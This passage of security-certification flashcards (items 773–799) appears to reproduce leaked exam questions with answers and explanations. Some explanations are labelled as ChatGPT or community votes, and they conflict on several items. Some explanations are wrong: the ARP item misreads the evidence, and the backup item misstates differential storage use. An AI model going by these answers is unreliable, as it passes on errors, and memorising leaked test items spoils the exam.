C. RADIUS
D. CHAP

A

B. SAML (Security Assertion Markup Language)

Here’s why SAML is the appropriate choice:

SAML (Security Assertion Markup Language): SAML is a standard protocol for exchanging authentication and authorization data between identity providers (such as the company's user directory) and service providers (such as the vendor's security tool in the cloud). By implementing SAML, the company can enable single sign-on (SSO), allowing users to authenticate once with their standard credentials stored in the company's user directory. This eliminates the need for the security director to manage additional user accounts and passwords specific to the vendor's tool.

Let’s briefly discuss why the other options are not as suitable:

802.1X (Option A): 802.1X is an IEEE standard for network access control and does not directly address the integration of cloud-based security tools with user directories for authentication purposes.

RADIUS (Option C): RADIUS (Remote Authentication Dial-In User Service) is a protocol commonly used for network access authentication, authorization, and accounting. While it can integrate with user directories, it typically requires more configuration and is more commonly used for network access rather than cloud-based services.

CHAP (Challenge Handshake Authentication Protocol) (Option D): CHAP is a protocol used to authenticate a remote user or device to an authenticating entity. It is not typically used for integrating cloud-based services with user directories in the context described.

Therefore, B. SAML is the best choice for enabling the company to integrate the vendor’s security tool in the cloud with their standard user directory for authentication purposes, while maintaining ease of management and security.

774
Q

An organization wants to ensure it can track changes between software deployments. Which of the following concepts should the organization implement?

A. Continuous monitoring
B. Rights management
C. Non-repudiation
D. Version control

A

D. Version control

Here’s why version control is the correct choice:

Version control: Also known as source control or revision control, version control systems (VCS) track changes to files over time. They allow developers (or anyone working on the software) to manage and track changes made to code, documentation, configurations, and other files throughout the software development lifecycle. Version control systems help teams collaborate effectively, revert to previous versions if necessary, and maintain a history of changes made to the software.

Continuous monitoring (Option A): Continuous monitoring refers to the process of actively monitoring systems and networks for security threats and vulnerabilities. While important for overall security, it does not specifically address tracking changes between software deployments.

Rights management (Option B): Rights management involves controlling access to resources based on user roles and permissions. It focuses on managing user access rather than tracking changes to software deployments.

Non-repudiation (Option C): Non-repudiation ensures that a sender or recipient of information cannot deny having sent or received the information. It is typically related to authentication and integrity rather than tracking software changes.

Therefore, D. Version control is the concept that the organization should implement to effectively track changes between software deployments, ensuring transparency, collaboration, and control over software development activities.

775
Q

A company has implemented a policy that requires two people to agree in order to push any changes from the test codebase repository into production. Which of the following best describes this control type?

A. Detective
B. Technical
C. Physical
D. Operational

A

D. Operational

Here’s why:

Operational controls: These controls are put in place to manage and guide the conduct of people within an organization. They include policies, procedures, and standards that define acceptable behavior and practices. In this case, the policy requiring two people to agree before pushing changes to production is an operational control designed to ensure accountability and reduce the risk of unauthorized or erroneous changes being deployed.

Let’s briefly touch on the other options to clarify why they are not as fitting:

Detective controls (Option A): Detective controls are designed to detect and react to security incidents after they have occurred. They include monitoring, logging, and auditing mechanisms rather than policies governing how changes are made.

Technical controls (Option B): Technical controls refer to security measures that are implemented through technology. Examples include access controls, encryption, firewalls, etc. The policy described in the question focuses more on human behavior and decision-making rather than technological implementation.

Physical controls (Option C): Physical controls are measures implemented to physically protect assets, facilities, or resources. They include items like locks, access badges, and security guards, which are not directly related to the policy regarding code deployment described in the question.

Therefore, the best description of the control type requiring two people to agree before pushing changes to production is Operational control, as it pertains to organizational policies and procedures governing how activities are performed within the company.

776
Q

A security administrator is reviewing reports about suspicious network activity occurring on a subnet. Users on the network report that connectivity to various websites is intermittent. The administrator logs in to a workstation and reviews the following command output:

? (192.168.1.7) at <incomplete> on enp0s25
www.routerlogin.com (192.168.1.1) at 08:03:ee:dd:fb:2b [ether] on enp0s25
? (192.168.1.4) at on enp0s25
server1 (192.168.1.8) at 08:03:ee:dd:fb:2b [ether] on enp0s25
? (192.168.1.5) at 08:03:ee:dd:fb:2b [ether] on enp0s25
? (192.168.1.2) at <incomplete> on enp0s25
server2 (192.168.1.6) at 08:03:ee:dd:fb:2b [ether] on enp0s25</incomplete></incomplete>

Which of the following best describes what is occurring on the network?

A. ARP poisoning
B. On-path attack
C. URL redirection
D. IP address conflicts

A

A. ARP poisoning

Based on the provided command output, it appears that several entries in the ARP (Address Resolution Protocol) table are incomplete (<incomplete>). This is a key indicator of an ARP spoofing or ARP poisoning attack, which is often used to intercept traffic on a local network. Here’s how each option relates:</incomplete>

A. ARP poisoning: ARP poisoning involves manipulating ARP messages on a local network to associate the attacker’s MAC address with the IP address of another host (such as a gateway or server). This can lead to traffic being redirected through the attacker’s machine, causing intermittent connectivity issues and potentially allowing the attacker to intercept or modify network traffic.

B. On-path attack: While an on-path attack can encompass various methods, ARP poisoning specifically can be considered a form of on-path attack because it positions the attacker in the network path between two communication endpoints, allowing for traffic interception.

C. URL redirection: URL redirection typically refers to web traffic redirection from one URL to another, often through HTTP 3xx status codes. It is not directly related to the ARP table entries described in the scenario.

D. IP address conflicts: IP address conflicts occur when two devices on the same network have been assigned the same IP address, which results in connectivity problems. However, the ARP table entries in the scenario specifically indicate incomplete entries rather than conflicts between fully resolved IP addresses.

Therefore, based on the incomplete ARP entries and the symptoms described (intermittent connectivity and suspicious network activity), the most likely scenario occurring on the network is ARP poisoning (Option A). This attack should be mitigated promptly to restore normal network operations and prevent further potential security risks.

777
Q

A security analyst is looking for a way to categorize and share a threat actor’s TTPs with colleagues at a partner organization. Which of the following would be the best method to achieve this goal?

A. Releasing the lessons-learned report
B. Using the MITRE ATT&CK framework
C. Sharing the CVE IDs used in attacks
D. Sending relevant log files and pcaps

A

B. Using the MITRE ATT&CK framework

Here’s why:

MITRE ATT&CK framework: This framework provides a structured and standardized way to categorize and describe the behaviors of threat actors across various stages of an attack lifecycle. It covers tactics (high-level objectives of an attack) and techniques (specific methods used to achieve those objectives), providing a common language for describing and understanding cyber threats.

Benefits of using MITRE ATT&CK:
    Standardization: Ensures that TTPs are categorized consistently across different organizations.
    Granularity: Provides detailed descriptions of specific techniques used by threat actors.
    Sharing and collaboration: Facilitates sharing of threat intelligence between organizations, enabling them to understand and defend against similar attack patterns.
    Mapping and analysis: Allows analysts to map observed behaviors to known TTPs, aiding in threat hunting and incident response.

Option A (Releasing the lessons-learned report) may capture some aspects of TTPs, but it typically focuses more on internal organizational insights and responses rather than a standardized framework for describing attacker behaviors.

Option C (Sharing the CVE IDs used in attacks) is specific to vulnerabilities and does not comprehensively cover the broader set of TTPs used by threat actors.

Option D (Sending relevant log files and pcaps) provides raw data that can be analyzed but lacks the structured categorization and standardization provided by frameworks like MITRE ATT&CK.

Therefore, using the MITRE ATT&CK framework (Option B) would be the best method for the security analyst to categorize and share a threat actor’s TTPs with colleagues at a partner organization, ensuring clear communication and effective collaboration in threat intelligence sharing.

778
Q

A systems administrator wants to add a second factor to the single sign-on portal that the organization uses. Currently, only a username and password are required. Which of the following should the administrator implement to best meet this requirement?

A. Personal verification questions
B. Software-based TOTP
C. Log-in image checks
D. Secondary PIN code

A

B. Software-based TOTP (Time-based One-Time Password). Here’s why this option is the most appropriate:

Security Strength: TOTP generates a unique, time-sensitive code that users must enter along with their username and password. This significantly enhances security because even if someone obtains the username and password, they would also need the current TOTP code to gain access.

Convenience: TOTP codes can be generated using various authenticator apps on smartphones or through hardware tokens. This method is generally more convenient than alternatives like personal verification questions or image checks.

Implementation: TOTP is widely supported and relatively easy to implement compared to some other second-factor methods. It integrates well with most single sign-on systems and doesn't require additional hardware for most users.

Therefore, choosing software-based TOTP (option B) would best meet the requirement of adding a second factor to enhance the security of the organization’s single sign-on portal.

779
Q

A company needs to keep the fewest records possible, meet compliance needs, and ensure destruction of records that are no longer needed. Which of the following best describes the policy that meets these requirements?

A. Security policy
B. Classification policy
C. Retention policy
D. Access control policy

A

C. Retention policy.

Here’s why:

Minimizing Records: A retention policy specifies how long different types of records must be kept. By defining specific retention periods, the company can ensure it only retains records for as long as necessary, thereby keeping the fewest records possible.

Compliance Requirements: Many industries and jurisdictions have regulations that dictate how long certain types of records must be retained. A retention policy ensures that the company complies with these legal and regulatory requirements.

Destruction of Records: A retention policy also outlines procedures for the secure destruction of records once their retention period expires. This ensures that records are not kept longer than necessary and are properly disposed of when no longer needed.

Therefore, option C, a retention policy, is the most appropriate policy to meet the company’s requirements regarding records management, compliance, and record destruction.

780
Q

A systems administrator is considering switching from tape backup to an alternative backup solution that would allow data to be readily available in the event of a disaster. Which of the following backup types should the administrator implement?

A. Copy
B. Incremental
C. Cloud
D. Disk

A

C. Cloud
Explanation:

C. Cloud:

Readily Available Data: Cloud backup solutions often provide high availability and quick access to data, making it readily available in case of a disaster.
Disaster Recovery: Cloud backups are stored offsite, which is crucial for disaster recovery. This ensures that data is safe even if the physical location is compromised.
Scalability: Cloud storage solutions can easily scale to accommodate growing data needs without the need for additional physical infrastructure.
Automation: Cloud backups can often be automated, reducing the risk of human error and ensuring regular backups.
Accessibility: Data stored in the cloud can be accessed from anywhere, providing flexibility in recovery options.

While other options have their benefits, they may not offer the same level of availability and disaster recovery capability as cloud solutions:

A. Copy:

Copy backups create an exact duplicate of the data at a specific point in time. While useful, they don't inherently provide the disaster recovery benefits of offsite storage unless combined with another solution.

B. Incremental:

Incremental backups save changes made since the last backup. They are efficient in terms of storage and backup time but require a complete set of previous backups to restore, which can be time-consuming and complex in a disaster scenario.

D. Disk:

Disk-based backups provide faster recovery times compared to tape backups and can be accessed more quickly. However, without an offsite component, they do not provide the same level of disaster recovery protection as cloud solutions.

Therefore, cloud backups offer the best solution for readily available data in the event of a disaster

781
Q

A web application for a bank displays the following output when showing details about a customer’s bank account:

Bank’s account information
Account : 121406-850212-**
Client: J
* E
**
Amount: $1,000,000,00 USD
Date : 26-Apr-2021 02:00:00 CST

Which of the following techniques is most likely implemented in this web application?

A. Data minimization
B. Data scrambling
C. Data masking
D. Anonymization

A

C. Data masking.

Here’s why data masking (option C) is the likely technique:

Purpose: Data masking is used to obscure or hide specific portions of sensitive data while retaining its usability for certain purposes, such as display or testing.

Example: In the provided output:
    The account number is partially obscured (masked) to protect its confidentiality.
    The client's name is partially obscured, likely to maintain anonymity or privacy.

Implementation: Data masking allows applications to show relevant information to users while hiding or obfuscating parts of the data that are not necessary for the current context, thereby reducing the risk of unauthorized access or exposure.

Therefore, the technique most likely implemented in the web application displaying the customer’s bank account details is C. Data masking.

782
Q

The security team installed video cameras in a prominent location in the building lobby.
Which of the following best describe this type of control? (Choose two.)

A. Technical
B. Detective
C. Deterrent
D. Managerial
E. Compensating
F. Corrective

A

B. Detective
C. Deterrent
Explanation:

B. Detective:

Definition: Detective controls are designed to identify and alert about undesirable events that have occurred.
Application: Video cameras record activities and can be reviewed to detect unauthorized access or other security incidents.

C. Deterrent:

Definition: Deterrent controls are intended to discourage individuals from engaging in undesirable behavior by increasing the perceived risk of being caught.
Application: The presence of video cameras in a prominent location acts as a deterrent to potential intruders or wrongdoers by making them aware that their actions are being monitored and recorded.
783
Q

Which of the following is best to use when determining the severity of a vulnerability?

A. CVE
B. OSINT
C. SOAR
D. CVSS

A

D. CVSS (Common Vulnerability Scoring System)
Explanation:

D. CVSS (Common Vulnerability Scoring System):

Definition: CVSS is a standardized framework for rating the severity of security vulnerabilities. It provides a numerical score that reflects the severity of a vulnerability based on several factors, including the ease of exploitability and the potential impact on the system.
Application: CVSS scores help organizations prioritize vulnerabilities based on their severity and potential impact, making it a crucial tool for vulnerability management.

The other options are not as specifically designed for determining the severity of a vulnerability:

A. CVE (Common Vulnerabilities and Exposures):

Definition: CVE is a list of publicly disclosed information security vulnerabilities and exposures.
Application: CVE identifiers are used to uniquely identify vulnerabilities, but they do not provide a severity rating. They are often used in conjunction with CVSS scores to describe vulnerabilities.

B. OSINT (Open Source Intelligence):

Definition: OSINT involves collecting and analyzing publicly available information to support security efforts.
Application: While useful for gathering context and intelligence on threats, OSINT does not provide a standardized method for determining vulnerability severity.

C. SOAR (Security Orchestration, Automation, and Response):

Definition: SOAR platforms are designed to improve the efficiency and effectiveness of security operations by automating and orchestrating security tasks and responses.
Application: SOAR tools can help manage and respond to vulnerabilities, but they are not specifically used for determining the severity of a vulnerability.
784
Q

Which of the following best describes an environment where a business owns the application and operating system but requires the resources to host them in the cloud?

A. IaaS
B. XaaS
C. PaaS
D. SaaS

A

A. IaaS (Infrastructure as a Service).

Here’s why:

IaaS: Infrastructure as a Service provides virtualized computing resources over the internet. In this model, the cloud provider manages the infrastructure, including servers, storage, and networking. However, the business retains control over the operating systems, applications, and development frameworks that run on the infrastructure.

Ownership: In the described scenario, the business owns and manages the operating systems and applications. They are responsible for installing, configuring, and maintaining these components on the cloud-based infrastructure provided by the IaaS provider.

Flexibility: IaaS allows businesses to scale resources up or down as needed, pay only for what they use, and avoid the upfront costs and complexity of owning and maintaining physical hardware.

Therefore, A. IaaS (Infrastructure as a Service) is the best description of an environment where a business owns the application and operating system but leverages cloud resources for hosting.

785
Q

An organization wants to minimize the recovery time from backups in case of a disaster. Backups must be retained for one month, while minimizing the storage space used for backups. Which of the following is the best approach for a backup strategy?

A. Full monthly, incremental daily, and differential weekly
B. Full weekly and incremental daily
C. Full weekly and differential daily
D. Full daily

A

(Brain dump : C. Full weekly and differential daily)
(Community : C 45%, B 39%, A 16%)
Full weekly and differential daily. This option will minimize the recovery time, as you only need to restore the latest the latest full backup and latest differential backup to get the most recent data. It will also minimize the storage space, as differential backups only store the changes made since the last full backup, unlike incremental backups that store the changes made since the last backup of any type

ChatGPT
B. Full weekly and incremental daily

Here’s why this approach is suitable:

Full Weekly: Performing a full backup weekly ensures that all data is backed up completely once a week. This helps in quickly restoring data in case of a disaster because the most recent full backup is readily available.

Incremental Daily: Incremental backups capture only the changes made since the last backup, whether it was a full or incremental backup. This approach reduces the amount of data stored daily compared to full backups, thus minimizing storage space usage.

Advantages:

Recovery Time: With daily incremental backups, the recovery time can be minimized because only the full backup and the incremental backups since the last full backup need to be restored.

Storage Efficiency: Incremental backups are efficient in terms of storage because they only store changes, which are typically smaller than full backups. This helps in meeting the requirement to minimize storage space used for backups.

Therefore, B. Full weekly and incremental daily is the best approach for balancing quick recovery times and efficient use of storage space in the event of a disaster.

786
Q

An incident analyst finds several image files on a hard disk. The image files may contain geolocation coordinates. Which of the following best describes the type of information the analyst is trying to extract from the image files?

A. Log data
B. Metadata
C. Encrypted data
D. Sensitive data

A

B. Metadata.

Here’s why:

Metadata: Image files often contain metadata, which includes information about the file itself, such as the date and time the photo was taken, the camera settings, and sometimes geolocation coordinates (latitude and longitude) if the device that captured the image supports GPS tagging.

Geolocation Coordinates: Some image files, especially those taken with smartphones or GPS-enabled cameras, embed geolocation coordinates in the metadata. This can reveal where the photo was taken, which may be sensitive information if not handled appropriately.

Analyst's Role: The incident analyst is likely interested in extracting metadata from the image files to understand if they contain geolocation coordinates, as this information could potentially be sensitive or pose a security risk depending on the context.

Therefore, the analyst is primarily focused on extracting metadata from the image files to identify and potentially manage the presence of geolocation coordinates.

787
Q

A company uses a SaaS vendor to host its customer database. The company would like to reduce the risk of customer data exposure if the systems are breached. Which of the following risks should the company focus on to achieve this objective?

A. Access auditing
B. Outsourced code development
C. Supply chain
D. Open ports and services

A

Community : A 45%, C 33%, D 22%
A. Access auditing
The company has to depend on or trust the SaaS vendor concerning B-D. Worry all it wants to about that. Get a different vendor if you can’t trust it. A is the only one the company has control over to put focus upon

(ChatGPT)
A. Access auditing
Explanation:

Access auditing:

Purpose: Access auditing involves monitoring and reviewing who has access to sensitive data, how and when they access it, and ensuring that access controls are properly enforced.
Importance: By focusing on access auditing, the company can ensure that only authorized individuals have access to the customer data. This helps in detecting and responding to any unauthorized access attempts promptly, thus reducing the risk of data exposure.
Mitigation: Implementing stringent access control mechanisms, regular audits, and monitoring access logs can significantly reduce the likelihood of unauthorized data access and potential breaches.

Why Other Options Are Less Relevant in This Context:

B. Outsourced code development:

Focus: This relates to the security and quality of code developed by third-party vendors. While important, it is less directly related to mitigating the risk of data exposure in a SaaS environment compared to access auditing.

C. Supply chain:

Focus: Supply chain risk management addresses vulnerabilities that arise from third-party vendors and service providers. Although supply chain security is crucial, access auditing is more directly related to controlling and monitoring access to customer data.

D. Open ports and services:

Focus: This pertains to network security and ensuring that unnecessary ports and services are not exposed to potential attackers. While securing open ports and services is important, it is more relevant to network-level security rather than directly reducing the risk of customer data exposure in a SaaS environment.

Therefore, focusing on access auditing is the most effective way to reduce the risk of customer data exposure in a SaaS environment.

(Brain dump : D. Open ports and services)

788
Q

An employee finds a USB flash drive labeled “Salary Info” in an office parking lot. The employee picks up the USB flash drive, goes into the office, and plugs it into a laptop. Later, a technician inspects the laptop and realizes it has been compromised by malware. Which of the following types of social engineering attacks has occurred?

A. Smishing
B. Baiting
C. Tailgating
D. Pretexting

A

B. Baiting.

Here’s why:

Baiting: In baiting attacks, malicious actors leave physical devices like USB flash drives labeled with enticing names (such as "Salary Info") in locations where they are likely to be found by employees. The goal is to pique curiosity or appeal to the employee's interests, leading them to plug the device into a computer.

Scenario Explanation: In this case, the employee found a USB flash drive labeled "Salary Info" in the office parking lot. This label was designed to attract attention and induce the employee to connect the USB drive to a laptop. Unfortunately, this action led to the laptop becoming compromised with malware.

Outcome: By plugging in the USB drive, the employee unknowingly introduced malware into the corporate network, demonstrating the effectiveness of the baiting tactic.

Therefore, the social engineering attack described in the scenario is B. Baiting.

789
Q

The primary goal of the threat-hunting team at a large company is to identify cyberthreats that the SOC has not detected. Which of the following types of data would the threat-hunting team primarily use to identify systems that are exploitable?

A. Vulnerability scan
B. Packet capture
C. Threat feed
D. User behavior

A

Community : C 37%, B 37%, A 23%
C. Threat feed
COMPTIA says “Where vulnerability scanning uses lists of patches and standard definitions of baseline configurations, threat hunting is an assessment technique that utilizes insights
gained from threat intelligence to proactively discover whether there is evidence of
TTPs already present within the network or system”.

This eliminates option A. Vulnerability scan.

Darril Gibson mentions the tools used for threat hunting include OSINT, threat feeds, intelligence fusion (which combines all this data to create a picture of likely threats and risks for an organization. This helps the cybersecurity analysts understand how threat actors may maneuver through the network, how to detect them, and how to mitigate their efforts once they’re discovered)

Within the Darril Gibson Sec+ SY0-601 Study Guide it identifies and lists Threat Feeds within its Threat Hunting section.

Threat Hunting is the process of actively looking for threats within a network before an automated tool detects and reports on the threat. An important part of Threat Hunting is gathering data on the threat through threat intelligence. This knowledge comes from both internal and external sources.

Threat Feeds provide subscribers with up-to-date information on current threats. Threat Feeds use both structured data reports and unstructured reports.

(Brain dump & ChatGPT)
A. Vulnerability scan

Here’s why:

Vulnerability Scan: A vulnerability scan involves scanning systems and networks to identify known vulnerabilities that could be exploited by attackers. By regularly conducting vulnerability scans, the threat-hunting team can identify systems that have vulnerabilities that could potentially be exploited.

Exploitability: Vulnerability scan results provide information on specific vulnerabilities present in systems, including their severity and potential impact. This helps the threat-hunting team prioritize and investigate systems that are at higher risk of being exploited.

Complementing SOC: While the SOC focuses on monitoring and detecting known threats and suspicious activities in real-time, the threat-hunting team's role often involves proactive searching for potential threats and weaknesses that might not have been previously identified by automated systems or alerts.

Therefore, to identify systems that are exploitable and to fulfill their goal of discovering cyberthreats that the SOC may have missed, the threat-hunting team would primarily use A. Vulnerability scan data.

790
Q

Which of the following best describes the process of adding a secret value to extend the length of stored passwords?

A. Hashing
B. Quantum communications
C. Salting
D. Perfect forward secrecy

A

C. Salting.

Here’s why salting is the correct answer:

Salting: Salting is the technique of adding a unique, random value (known as a salt) to each password before hashing it. This salt value ensures that even if two users have the same password, their hashed passwords stored in the database will be different. Salting helps defend against attacks like rainbow table attacks, where attackers precompute hashes for common passwords.

Purpose: Salting extends the effective length of stored passwords by making each password unique when hashed with its salt. This enhances the security of stored passwords because it prevents attackers from easily using precomputed hash tables to crack passwords.

Comparison with Other Options:
    Hashing (option A): Hashing alone does not involve adding a salt. It converts a password into a fixed-length hash value.
    Quantum communications (option B): This refers to secure communication methods using principles of quantum mechanics, not related to password storage.
    Perfect forward secrecy (option D): This ensures that session keys are not compromised even if long-term keys are compromised, not directly related to password hashing.

Therefore, the process described, where a secret value is added to passwords to extend their length in storage, is best represented by C. Salting.

791
Q

Adding a value to the end of a password to create a different password hash is called:

A. salting.
B. key stretching.
C. steganography.
D. MD5 checksum

A

A. salting
Explanation:

Salting:

Definition: Salting involves adding a unique value (known as a salt) to the end (or beginning) of a password before hashing it. This salt ensures that even if two users have the same password, their hashes will be different because each hash incorporates a unique salt.
Purpose: The primary purpose of salting is to protect against rainbow table attacks and ensure that identical passwords do not result in identical hashes, thus enhancing security.

Why Other Options Are Incorrect:

B. Key stretching:

Definition: Key stretching is a technique used to make brute-force attacks more difficult by applying a hash function multiple times. While related to password security, it does not specifically involve adding a value to the end of a password.

C. Steganography:

Definition: Steganography is the practice of hiding data within other data, such as embedding a hidden message within an image. It is not related to password hashing.

D. MD5 checksum:

Definition: MD5 is a cryptographic hash function that produces a 128-bit hash value. An MD5 checksum is the result of hashing data with MD5. It does not involve adding a value to a password, and MD5 is generally not recommended for password hashing due to its vulnerabilities.

Therefore, the correct term for adding a value to the end of a password to create a different password hash is salting.

792
Q

An organization is concerned about hackers bypassing MFA through social engineering of phone carriers. Which of the following would most likely protect against such an attack?

A. Receiving alerts about unusual log-in activity
B. Receiving a six-digit code via SMS
C. Receiving a push notification to a mobile application
D. Receiving a phone call for automated approval

A

C. Receiving a push notification to a mobile application

The organization’s concern about hackers bypassing Multi-Factor Authentication (MFA) through social engineering of phone carriers suggests a need for an MFA method that is less vulnerable to SIM swapping or phone number porting attacks, which are common in such social engineering tactics.

Among the options provided:

A. Receiving alerts about unusual log-in activity: While this can help detect unauthorized access attempts, it does not directly prevent or protect against SIM swapping attacks.

B. Receiving a six-digit code via SMS: This method is vulnerable to SIM swapping attacks because attackers can intercept SMS messages containing the verification code if they successfully transfer the victim’s phone number to their own device.

C. Receiving a push notification to a mobile application: This method is generally more secure than SMS because push notifications are not vulnerable to SIM swapping attacks. They are sent directly to the registered mobile device and cannot be intercepted by attackers who have only taken control of the victim’s phone number.

D. Receiving a phone call for automated approval: This method, while potentially secure if implemented properly, can also be vulnerable to SIM swapping attacks if the attacker has control over the victim’s phone number.

Therefore, the option that would most likely protect against hackers bypassing MFA through social engineering of phone carriers is C. Receiving a push notification to a mobile application. This method is less vulnerable to SIM swapping attacks compared to SMS-based authentication methods.

793
Q

A security analyst is working with a vendor to get a new SaaS application deployed to an enterprise. The analyst wants to ensure role-based security policies are correctly applied as users access the application. Which of the following is most likely to solve the issue?

A. CASB
B. AUP
C. NG-SWG
D. VPC endpoint

A

A. CASB (Cloud Access Security Broker).

Here’s why CASB is the correct choice:

CASB: CASBs are cloud-native security tools that sit between users and cloud service providers to enforce security policies. They provide visibility into cloud usage, data protection, and threat protection across SaaS applications. CASBs can enforce role-based access controls (RBAC) by integrating with identity and access management (IAM) systems, ensuring that only authorized users with specific roles have appropriate access to the SaaS application.

Role-Based Security Policies: CASBs can enforce policies based on user roles, ensuring that users are granted the correct permissions and access levels according to their roles within the organization.

Other Options:
    AUP (Acceptable Use Policy): AUP defines acceptable behavior when using IT resources but does not enforce role-based security policies.
    NG-SWG (Next-Generation Secure Web Gateway): NG-SWG primarily focuses on web traffic security, filtering, and monitoring rather than role-based access controls for SaaS applications.
    VPC endpoint (Virtual Private Cloud endpoint): VPC endpoints are used to connect privately to AWS services without traversing the internet, but they do not directly address role-based security policies for SaaS applications.

Therefore, A. CASB (Cloud Access Security Broker) is the most likely solution to ensure role-based security policies are correctly applied as users access the SaaS application in the enterprise environment.

794
Q

A municipality implements an IoT device discovery scanner and finds a legacy controller for a critical internal utility SCADA service that is running firmware with multiple vulnerabilities. Unfortunately, the controller cannot be upgraded, and a replacement for it is not available for at least a year. Which of the following is the best action to take to mitigate the risk posed by this controller in the meantime?

A. Isolate the controller from the rest of the network and constrain connectivity.
B. Remove the controller from the network altogether.
C. Quarantine the controller in a VLAN used for device patching from the internet.
D. Configure the internet firewall to deny any internet access to or from the controller.

A

A. Isolate the controller from the rest of the network and constrain connectivity.

Here’s why this is the best choice:

Isolation: By isolating the controller from the rest of the network, you reduce the attack surface and limit the potential pathways for attackers to exploit vulnerabilities in the firmware.

Constrain Connectivity: Restricting connectivity means ensuring that only necessary communication paths are allowed to and from the controller. This can involve implementing firewall rules or network segmentation to control which devices or systems can communicate with the controller.

Considerations:
    Option B (Removing the controller): This may not be feasible if the controller is critical to the SCADA service and no immediate replacement is available.
    Option C (Quarantine in a VLAN): While VLAN quarantine is useful for patching devices, it may not fully mitigate risks if the vulnerabilities are severe and can be exploited locally within the network.
    Option D (Deny internet access): This is important but may not be sufficient if the vulnerabilities could be exploited internally within the network.

Therefore, A. Isolate the controller from the rest of the network and constrain connectivity is the best immediate action to reduce the risk until a replacement or upgrade for the controller becomes available.

795
Q

Which of the following types of data are most likely to be subject to regulations and laws? (Choose two.)

A. PHI
B. Trade secrets
C. Proprietary
D. OSINT
E. PII
F. Public

A

A. PHI (Protected Health Information) - PHI refers to any health information that can be linked to a specific individual, which is protected by laws such as the Health Insurance Portability and Accountability Act (HIPAA) in the United States. Regulations ensure that PHI is handled securely and confidentially to protect individuals’ privacy and rights.

E. PII (Personally Identifiable Information) - PII includes any information that can be used to identify an individual, such as their name, address, Social Security number, or biometric data. Laws and regulations worldwide, such as the General Data Protection Regulation (GDPR) in the European Union and various data protection laws in different countries, govern the collection, use, and protection of PII to prevent unauthorized access and misuse.

Explanation:

Trade secrets (option B) and proprietary (option C) information can be protected through contractual agreements and intellectual property laws, but they are not typically subject to the same regulatory requirements as PHI and PII.

OSINT (option D) refers to information gathered from publicly available sources and is not subject to specific privacy laws but may be subject to ethical considerations and terms of service agreements.

Public (option F) data is information that is freely accessible and generally not subject to privacy laws, as it does not contain sensitive personal or confidential information.

Therefore, the types of data most likely to be subject to regulations and laws are A. PHI and E. PII.

796
Q

An analyst is reviewing an incident in which a user clicked on a link in a phishing email. Which of the following log sources would the analyst utilize to determine whether the connection was successful?

A. Network
B. System
C. Application
D. Authentication

A

A. Network logs.

Here’s why:

Network Logs: Network logs capture information about network traffic, including connections made from endpoints (like a user's computer) to external servers or websites. When a user clicks on a link in a phishing email, the associated network logs can provide details such as:
    Destination IP address and domain name.
    Port numbers used for the connection.
    Protocol (e.g., HTTP, HTTPS) used for the connection.
    Timestamps of the connection attempts.

Detection: By examining network logs, the analyst can determine if the user's computer attempted to establish a connection to a suspicious or malicious external server or website after clicking on the phishing link. This can help in understanding the potential impact and scope of the incident.

Other Options:

System Logs (option B): While system logs might capture some information about user activity on the local machine, they typically do not provide detailed information about external network connections initiated by clicking a link.

Application Logs (option C): Application logs focus on activities within specific applications or services running on the system and may not directly capture external network connection attempts.

Authentication Logs (option D): Authentication logs track user login and authentication events but do not provide information about network connections initiated from clicking on a link.

Therefore, A. Network logs are the most relevant log source for determining whether a connection was successful after a user clicked on a link in a phishing email.

797
Q

Which of the following, if compromised, can indirectly impact systems’ availability by imposing inadequate environmental conditions for the hardware to operate properly?

A. SCADA
B. TPM
C. HSM
D. HVAC

A

D. HVAC.

Here’s why:

HVAC (Heating, Ventilation, and Air Conditioning) systems are critical for maintaining appropriate environmental conditions (temperature, humidity, airflow) in data centers and other facilities where hardware systems operate.

Impact on Availability: If the HVAC system is compromised or malfunctions, it can lead to inadequate environmental conditions:
    Temperature: High temperatures can cause overheating and hardware failure, while low temperatures can lead to operational issues.
    Humidity: Incorrect humidity levels can cause condensation or static electricity, affecting hardware components.
    Airflow: Inadequate airflow can lead to hotspots or uneven cooling, impacting hardware performance and reliability.

Indirect Impact: While SCADA (Supervisory Control and Data Acquisition), TPM (Trusted Platform Module), and HSM (Hardware Security Module) are critical for managing and securing systems, they do not directly control environmental conditions. Compromising HVAC systems indirectly impacts the availability of hardware by creating unfavorable environmental conditions that can lead to system downtime or reduced performance.

Therefore, D. HVAC is the correct choice as it can indirectly impact system availability by imposing inadequate environmental conditions necessary for hardware to operate properly.

798
Q

An audit report showed that a former employee saved the following files to an external USB drive before the employee’s termination date:

  • annual_tax_form.pdf
  • encrypted_passwords.db
  • team_picture.jpg
  • contact_list.db
  • human_resources.txt

Which of the following could the former employee do to potentially compromise corporate credentials?

A. Perform an offline brute-force attack
B. Use the files to create a rainbow table.
C. Conduct a token replay.
D. Release a network dictionary attack

A

A. Perform an offline brute-force attack

Here’s the reasoning:

encrypted_passwords.db: This file likely contains passwords that are encrypted. If the encryption method is weak or if the passwords are not properly protected, the former employee could attempt to perform an offline brute-force attack. In this attack, the encrypted passwords would be systematically decrypted using various techniques, such as trying different password combinations, until the correct one is found.

Other Options:
    Use the files to create a rainbow table (option B): Rainbow tables are precomputed tables used for reversing cryptographic hash functions to crack passwords. However, this requires specific hashes and is less likely with the files listed.
    Conduct a token replay (option C): Token replay attacks involve capturing and replaying valid authentication tokens to gain unauthorized access. None of the listed files directly suggest a token-based authentication method.
    Release a network dictionary attack (option D): This involves using a list of known words or commonly used passwords to attempt unauthorized access. The files listed do not necessarily facilitate this type of attack directly.

Therefore, A. Perform an offline brute-force attack is the most plausible method the former employee could use to potentially compromise corporate credentials based on the files saved to the USB drive.

799
Q

Which of the following best describes a legal hold?

A. It occurs during litigation and requires retention of both electronic and physical documents.
B. It occurs during a risk assessment and requires retention of risk-related documents.
C. It occurs during incident recovery and requires retention of electronic documents.
D. It occurs during a business impact analysis and requires retention of documents categorized as personally identifiable information

A

A. It occurs during litigation and requires retention of both electronic and physical documents.

Here’s why:

Legal Hold: A legal hold, also known as a litigation hold or preservation order, is a directive to preserve all forms of relevant information (both electronic and physical documents) that may be related to a legal proceeding or investigation. It is issued to prevent the destruction, alteration, or loss of potentially relevant evidence.

Litigation Context: Legal holds are typically issued when litigation or a legal dispute is anticipated or already in progress. They require organizations to retain documents and data that may be pertinent to the case, ensuring that all relevant information is preserved for potential discovery and review by the opposing party.

Other Options:
    Option B: Risk assessments focus on evaluating risks and their impacts, not legal holds.
    Option C: Incident recovery involves restoring systems and data after an incident, not necessarily related to legal holds.
    Option D: Business impact analysis assesses the potential consequences of disruptions to business operations, not related to legal holds.

